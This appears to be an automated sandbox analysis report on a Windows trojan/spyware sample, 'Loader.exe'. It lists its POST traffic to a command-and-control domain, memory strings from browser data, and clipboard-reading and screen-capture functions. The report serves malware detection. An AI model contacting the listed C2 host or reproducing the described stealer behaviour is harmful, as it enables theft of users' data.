              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: Loader.exe, 00000003.00000003.1806230046.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1806503830.000000000343E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&k
              Source: Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Loader.exe, 00000003.00000003.1714565206.00000000059D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Loader.exe, 00000003.00000003.1714565206.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760947199.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1761076038.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714647625.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760850531.0000000005987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Loader.exe, 00000003.00000003.1714647625.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Loader.exe, 00000003.00000003.1714565206.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760947199.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1761076038.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714647625.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760850531.0000000005987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Loader.exe, 00000003.00000003.1714647625.0000000005962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/
              Source: Loader.exe, 00000003.00000003.1903481642.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881971476.0000000005941000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1905041050.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1902629994.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882279810.0000000005943000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1852907348.0000000005941000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1905606530.0000000005944000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1902815699.0000000005944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/api
              Source: Loader.exe, 00000003.00000003.1902857262.000000000336C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1903575535.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1904716370.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiC
              Source: Loader.exe, 00000003.00000003.1810035314.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1809849509.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1810109813.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1835602520.0000000003416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apibV7RydFqE=
              Source: Loader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apic
              Source: Loader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apii
              Source: Loader.exe, 00000003.00000003.1852907348.0000000005954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click:443/apiG
              Source: Loader.exe, 00000003.00000003.1806230046.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1806503830.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Loader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.30.13:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433600
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433600
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433B7A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00433B7A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009210000_2_00921000
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009340A20_2_009340A2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092F6450_2_0092F645
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009478820_2_00947882
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00939DB00_2_00939DB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00945D4E0_2_00945D4E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_009340A22_2_009340A2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_009210002_2_00921000
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0092F6452_2_0092F645
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_009478822_2_00947882
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00939DB02_2_00939DB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00945D4E2_2_00945D4E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C9D43_2_0042C9D4
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00410A573_2_00410A57
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004152003_2_00415200
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004093703_2_00409370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426B703_2_00426B70
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00421B103_2_00421B10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043CB203_2_0043CB20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423D403_2_00423D40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040CD4E3_2_0040CD4E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004085F03_2_004085F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00440E003_2_00440E00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004396A03_2_004396A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004417003_2_00441700
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040D7CF3_2_0040D7CF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004088003_2_00408800
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041780D3_2_0041780D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004410D03_2_004410D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042788F3_2_0042788F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004039003_2_00403900
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C9003_2_0041C900
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004121003_2_00412100
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043A1203_2_0043A120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004059303_2_00405930
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D1C03_2_0043D1C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004081D03_2_004081D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043A9D63_2_0043A9D6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004259E43_2_004259E4
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004331803_2_00433180
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004249903_2_00424990
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004062403_2_00406240
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004312103_2_00431210
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E2203_2_0041E220
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427A3F3_2_00427A3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004042B03_2_004042B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004402B03_2_004402B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041DB403_2_0041DB40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004223703_2_00422370
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00408B003_2_00408B00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00424B003_2_00424B00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004283073_2_00428307
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004403D03_2_004403D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004413E03_2_004413E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404BF03_2_00404BF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041AB803_2_0041AB80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438C5D3_2_00438C5D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00416C773_2_00416C77
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437C783_2_00437C78
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042AC303_2_0042AC30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042F4F63_2_0042F4F6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00419C903_2_00419C90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004164923_2_00416492
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042CCA23_2_0042CCA2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004074A03_2_004074A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004264B03_2_004264B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438CB03_2_00438CB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E5403_2_0041E540
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004405503_2_00440550
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C5613_2_0041C561
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D57F3_2_0042D57F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004385C73_2_004385C7
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00411DC93_2_00411DC9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418DE63_2_00418DE6
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040ADEC3_2_0040ADEC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004115F13_2_004115F1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004205833_2_00420583
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042E64D3_2_0042E64D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041966B3_2_0041966B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004406003_2_00440600
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041DE103_2_0041DE10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417E1A3_2_00417E1A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422E3F3_2_00422E3F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402EC03_2_00402EC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004066D03_2_004066D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426ED03_2_00426ED0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004406903_2_00440690
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004146A03_2_004146A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426EB03_2_00426EB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004297403_2_00429740
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A7703_2_0040A770
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004287703_2_00428770
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438F103_2_00438F10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D7103_2_0043D710
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415F193_2_00415F19
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436F2C3_2_00436F2C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043A7D03_2_0043A7D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004227E03_2_004227E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00416FF03_2_00416FF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040C7823_2_0040C782
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043AF803_2_0043AF80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00408F903_2_00408F90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004167903_2_00416790
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004307973_2_00430797
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E7A03_2_0041E7A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F7B23_2_0043F7B2
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0092FBD4 appears 34 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0093D0C6 appears 40 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0092FB50 appears 100 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407FE0 appears 41 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00930820 appears 40 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 009381E8 appears 42 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414690 appears 95 times
              Source: Loader.exe, 00000000.00000000.1656410195.00000000009AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exe, 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exe, 00000003.00000002.1904171728.00000000009AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exe, 00000003.00000003.1667582762.00000000032A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003360896915585
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@1/1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004396A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004396A0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
